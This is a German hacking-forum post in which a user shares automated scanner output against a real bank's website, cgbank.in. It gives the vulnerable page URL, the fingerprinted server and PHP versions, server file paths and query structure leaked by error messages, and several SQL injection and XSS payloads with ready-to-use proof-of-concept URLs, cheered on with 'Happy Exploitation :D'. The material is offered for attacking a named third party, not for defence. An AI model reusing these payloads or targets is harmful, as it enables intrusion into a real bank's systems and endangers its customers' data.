Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

[SQLi+XSS] cgbank.in

- - - - -
Erstellt von TeamSploit ,

  • Bitte melde dich an um zu Antworten
Keine Antworten in diesem Thema

#1
TeamSploit
Geschrieben 08 May 2017 - 15:37 Uhr

TeamSploit

    Noob

  • Members
  • PIPPIP
    • Likes
    0
  • 3 Beiträge
  • 0 Bedankt
  • verifiziert
[!] Scan URL or List of URLs? [1/2]: 1
 [!] Enter the URL: http://www.cgbank.in/innerpage.php?pageID=3

 [!] Fingerprinting the backend Technologies.
 [!] Status code: 200 OK
 [!] Host: www.cgbank.in
 [!] WebServer: Microsoft-IIS/8.5
 [!] x-powered-by
 [!] PHP/5.2.17, ASP.NET
 [!] Now Scanning for Remote Code/Command Execution
 [!] Covering Linux & Windows Operating Systems
 [!] Please wait ....
 [!] Target is not vulnerable!

 [!] Now Scanning for XSS
 [!] Please wait ....
 [*] Payload Found . . .
 [*] Payload:  %78%22%78%3e%78
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"x>x' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=3x\"x>x in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=3%78%22%78%3e%78
 [*] Happy Exploitation :D
 [!] Congratulations you've found 1 bugs :-)

 [!] Now Scanning for Error Based SQL Injection
 [!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
 [!] Please wait ....
 [*] Payload Found . . .
 [*] Payload:  3'
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\' in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33'
 [*] Happy Exploitation :D
 [*] Payload Found . . .
 [*] Payload:  3%5c
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\\ in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33%5c
 [*] Happy Exploitation :D
 [*] Payload Found . . .
 [*] Payload:  3%27%22%28%29
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"()' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\'\"() in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33%27%22%28%29
 [*] Happy Exploitation :D
 [*] Payload Found . . .
 [*] Payload:  3'><
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'><' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\'>< in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33'><
 [*] Happy Exploitation :D
 [!] Congratulations you've found 4 bugs :-)

Zurück zu  Classic Hacking

  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 42 user(s)


    3eyes, Caruso, clusterhead, cruzz, cubik, Dr. Spic, dvalar, easysurfer, EShad0w, FatalityMods, Framerater, h04x, hacked, Hansiberg, hitman56, jmPesp, JohnR, Klaus, kleinkriminell, kpakpando, Kraenk, loginman1, MarkSantos, mashok, n1nja, Nexus88, PadX18, pekelhc, ProHex, rat123, romiro, SavE1, SecurityFlaw, Smokyjoe, SOCOM, st0rm, Stalin, stoneserv, TeamSploit, twixeis, w0tan, xrahitel
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking